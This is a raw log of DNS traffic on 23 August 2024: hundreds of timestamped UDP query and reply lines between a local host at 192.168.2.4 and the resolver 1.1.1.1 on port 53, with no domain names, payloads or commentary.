Aug 23, 2024 18:47:39.972032070 CEST	53	50272	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.972044945 CEST	53	62211	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974685907 CEST	53	64840	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974699020 CEST	53	57845	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974709988 CEST	53	51214	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974720955 CEST	53	63840	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974730968 CEST	53	51721	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.974740982 CEST	53	61911	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.976212978 CEST	53	51468	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.980855942 CEST	53	61183	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.980927944 CEST	53	63484	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.980938911 CEST	53	53218	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.981964111 CEST	53	65385	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.981975079 CEST	53	63248	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.981985092 CEST	53	56332	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.981996059 CEST	53	50904	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.982006073 CEST	53	53124	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.982014894 CEST	53	55827	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.982024908 CEST	53	54497	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.982034922 CEST	53	59317	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984158039 CEST	53	55304	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984169006 CEST	53	58652	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984179020 CEST	53	52002	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984188080 CEST	53	56734	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984208107 CEST	53	55482	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984220028 CEST	53	59453	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984229088 CEST	53	57932	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984240055 CEST	53	57433	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984247923 CEST	53	49446	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984257936 CEST	53	53993	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984266996 CEST	53	61184	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984280109 CEST	53	51206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984288931 CEST	53	49368	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984298944 CEST	53	55164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.984308004 CEST	53	65026	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.988687038 CEST	53	56925	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.990586042 CEST	53	63387	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.990598917 CEST	53	57540	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.996793032 CEST	53	62286	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.997307062 CEST	53	56099	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.997318029 CEST	53	63561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.000474930 CEST	53	55301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.008990049 CEST	53	58785	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.009103060 CEST	53	49898	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.009114027 CEST	53	63059	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012413979 CEST	53	63676	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012427092 CEST	53	63398	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012438059 CEST	53	52579	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012447119 CEST	53	58047	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012458086 CEST	53	60038	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012765884 CEST	53	64900	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012778044 CEST	53	50447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012787104 CEST	53	58846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012797117 CEST	53	52189	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012806892 CEST	53	61832	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.012816906 CEST	53	60293	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.015851021 CEST	53	58760	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.015866041 CEST	53	52739	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.015876055 CEST	53	59957	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.015886068 CEST	53	54992	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.019756079 CEST	53	64830	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.127703905 CEST	53	65056	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.148049116 CEST	53	53998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.155694008 CEST	56498	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.156353951 CEST	63796	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.165714025 CEST	49644	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.167004108 CEST	56967	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.168422937 CEST	59763	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.171806097 CEST	60778	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.172662973 CEST	51837	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.173218012 CEST	49897	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.173965931 CEST	52482	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.175565958 CEST	52774	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.176181078 CEST	58940	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.176321983 CEST	52043	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.177565098 CEST	56661	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.177896976 CEST	63884	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.178199053 CEST	56746	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.178553104 CEST	56014	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.178777933 CEST	58526	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.179351091 CEST	49751	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.180473089 CEST	62054	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.180846930 CEST	53766	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.181025028 CEST	54484	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.181205034 CEST	54454	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.184475899 CEST	59348	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.184670925 CEST	62890	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187319994 CEST	49345	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187319994 CEST	55209	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187510967 CEST	60436	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187558889 CEST	54627	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187697887 CEST	61346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.187782049 CEST	59855	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.188126087 CEST	58872	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.188357115 CEST	58317	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.188946009 CEST	59677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.189030886 CEST	49604	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.189486027 CEST	64749	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.190572977 CEST	62666	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.190743923 CEST	60970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.190790892 CEST	59841	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.190978050 CEST	61948	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191057920 CEST	63935	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191211939 CEST	59153	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191421986 CEST	50708	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191751957 CEST	55194	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191860914 CEST	60046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.191921949 CEST	54000	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.192090988 CEST	54934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.192162037 CEST	54452	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.192338943 CEST	56344	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.192702055 CEST	50438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.193083048 CEST	52208	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.193694115 CEST	49173	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.194118023 CEST	60066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.194315910 CEST	55284	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.194863081 CEST	59377	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.195035934 CEST	56802	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.195194006 CEST	52765	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.195777893 CEST	58086	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196145058 CEST	50120	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196386099 CEST	53708	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196429968 CEST	58990	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196605921 CEST	53233	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196775913 CEST	59837	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196830034 CEST	59531	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.196988106 CEST	64702	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.198335886 CEST	53	56498	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.205653906 CEST	53	56967	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.207686901 CEST	53	59763	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.211221933 CEST	53	51837	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.211572886 CEST	53	52482	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.213248968 CEST	53	52043	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.213262081 CEST	53	58940	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.214278936 CEST	53	56661	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.214289904 CEST	53	52774	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.215959072 CEST	53	56746	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.215970993 CEST	53	58526	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.216721058 CEST	53	49751	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.216733932 CEST	53	56014	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.216744900 CEST	53	62054	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.216757059 CEST	53	54454	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.218732119 CEST	53	53766	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.218744040 CEST	53	54484	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219010115 CEST	53	49345	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219027996 CEST	53	61346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219038963 CEST	53	60436	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219630003 CEST	53	54627	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219641924 CEST	53	58317	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219654083 CEST	53	55209	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219664097 CEST	53	49644	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219674110 CEST	53	59677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219686031 CEST	53	54934	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219695091 CEST	53	49604	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219706059 CEST	53	59841	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219716072 CEST	53	56802	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219727993 CEST	53	63935	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219755888 CEST	53	60970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219765902 CEST	53	50708	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219775915 CEST	53	60046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219784975 CEST	53	55194	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219794989 CEST	53	52208	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.219805002 CEST	53	59153	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.220038891 CEST	53	49173	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.220048904 CEST	53	59377	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.220057964 CEST	53	52765	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.220069885 CEST	53	53708	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.222500086 CEST	53	64702	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.227302074 CEST	53	50120	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.227452993 CEST	53	60778	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.227464914 CEST	53	49897	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.229192972 CEST	53	58086	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.234596968 CEST	53	63884	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.239334106 CEST	53	59348	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.240672112 CEST	53	62890	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.240711927 CEST	53	64749	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.240721941 CEST	53	59855	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.241166115 CEST	53	61948	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.244344950 CEST	53	54000	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.246208906 CEST	53	50438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.246376038 CEST	53	54452	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.246387005 CEST	53	56344	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.247714996 CEST	53	58872	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.247726917 CEST	53	58990	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.250020027 CEST	53	59837	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.251782894 CEST	53	60066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.252662897 CEST	53	55284	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.262087107 CEST	53	59531	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.339771986 CEST	53	63796	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.370776892 CEST	63579	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.374522924 CEST	53	62666	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.559891939 CEST	53	53233	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.608100891 CEST	55163	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:40.763443947 CEST	53	63579	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:40.987793922 CEST	53	55163	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.724631071 CEST	56998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.725372076 CEST	64602	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.726074934 CEST	61080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.726615906 CEST	52710	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.727207899 CEST	62078	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.727890968 CEST	63402	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.728807926 CEST	59175	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.728872061 CEST	61254	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.729696989 CEST	63432	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.730046988 CEST	65379	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.735950947 CEST	56073	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.736366987 CEST	50112	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.736426115 CEST	54233	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.736839056 CEST	62855	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.737068892 CEST	54840	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.737737894 CEST	53870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.737737894 CEST	62791	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.738075972 CEST	62674	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.738218069 CEST	56182	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.738323927 CEST	54094	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.738677025 CEST	59201	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.739077091 CEST	56010	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.739195108 CEST	60046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.739671946 CEST	50525	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.739783049 CEST	50080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.740129948 CEST	52344	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.740533113 CEST	56155	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.740734100 CEST	49600	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.741193056 CEST	58614	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.741571903 CEST	51043	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.741571903 CEST	58750	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.742387056 CEST	59187	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.742387056 CEST	54936	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.742476940 CEST	54698	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.742952108 CEST	61867	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.743024111 CEST	62506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.743551970 CEST	58274	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.743551970 CEST	56994	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.744327068 CEST	51989	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.744425058 CEST	63295	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.745156050 CEST	64822	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.745532036 CEST	58268	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.745743036 CEST	56287	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.745743036 CEST	49505	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.746175051 CEST	60582	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.746175051 CEST	61624	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.746678114 CEST	57933	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.746757030 CEST	57108	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.746877909 CEST	54392	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.747117996 CEST	49288	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.747737885 CEST	64232	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.747891903 CEST	60721	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.748579979 CEST	51924	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.748658895 CEST	50485	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.749119997 CEST	55316	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.749411106 CEST	51620	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.750103951 CEST	51315	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.750451088 CEST	51598	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.750451088 CEST	58778	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.750873089 CEST	60910	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.751652002 CEST	62226	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.753565073 CEST	61001	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.753772974 CEST	61553	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.754038095 CEST	54738	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.772279978 CEST	53	65379	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.773243904 CEST	53	63402	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.773582935 CEST	53	63432	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.773593903 CEST	53	54233	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775166035 CEST	53	62791	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775177002 CEST	53	50112	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775186062 CEST	53	54840	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775197029 CEST	53	62855	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775207043 CEST	53	59201	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775216103 CEST	53	56182	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.775226116 CEST	53	53870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777013063 CEST	53	56010	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777024031 CEST	53	50525	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777034044 CEST	53	58274	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777045012 CEST	53	50080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777055979 CEST	53	58268	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.777065039 CEST	53	54094	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778769970 CEST	53	61624	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778784037 CEST	53	58750	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778794050 CEST	53	61867	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778959036 CEST	53	56155	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778969049 CEST	53	51043	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778978109 CEST	53	49600	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778987885 CEST	53	58614	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.778997898 CEST	53	63295	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779007912 CEST	53	60582	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779017925 CEST	53	64822	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779028893 CEST	53	51989	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779037952 CEST	53	51620	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779048920 CEST	53	58778	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779059887 CEST	53	57108	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779073954 CEST	53	57933	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779889107 CEST	53	56287	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779901028 CEST	53	50485	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.779910088 CEST	53	62078	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.781064987 CEST	53	61553	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.781075001 CEST	53	55316	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.781085014 CEST	53	60721	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.781393051 CEST	53	51924	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.781409979 CEST	53	51315	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.782114983 CEST	53	60910	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.782125950 CEST	53	62226	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.782135963 CEST	53	59175	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.782145977 CEST	53	54738	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.786885977 CEST	53	54392	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.788320065 CEST	53	56073	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.789491892 CEST	53	62674	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.793085098 CEST	53	54936	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.793251038 CEST	53	59187	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.793262959 CEST	53	52344	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.794291019 CEST	53	60046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.795720100 CEST	53	56994	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.797342062 CEST	53	49505	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.798630953 CEST	53	62506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.798644066 CEST	53	49288	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.802999020 CEST	53	61001	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.881356955 CEST	54206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.881624937 CEST	61085	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.882385969 CEST	56681	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.882914066 CEST	51462	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.882914066 CEST	65263	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.883538008 CEST	53506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.883538008 CEST	49574	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.884310007 CEST	64842	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.884310007 CEST	57947	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.884846926 CEST	49725	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.885016918 CEST	63154	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.885632038 CEST	60598	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.885761976 CEST	52363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.886106968 CEST	52532	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.886816025 CEST	53778	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.886816025 CEST	61044	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.888113976 CEST	49762	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.888871908 CEST	62691	53	192.168.2.4	1.1.1.1
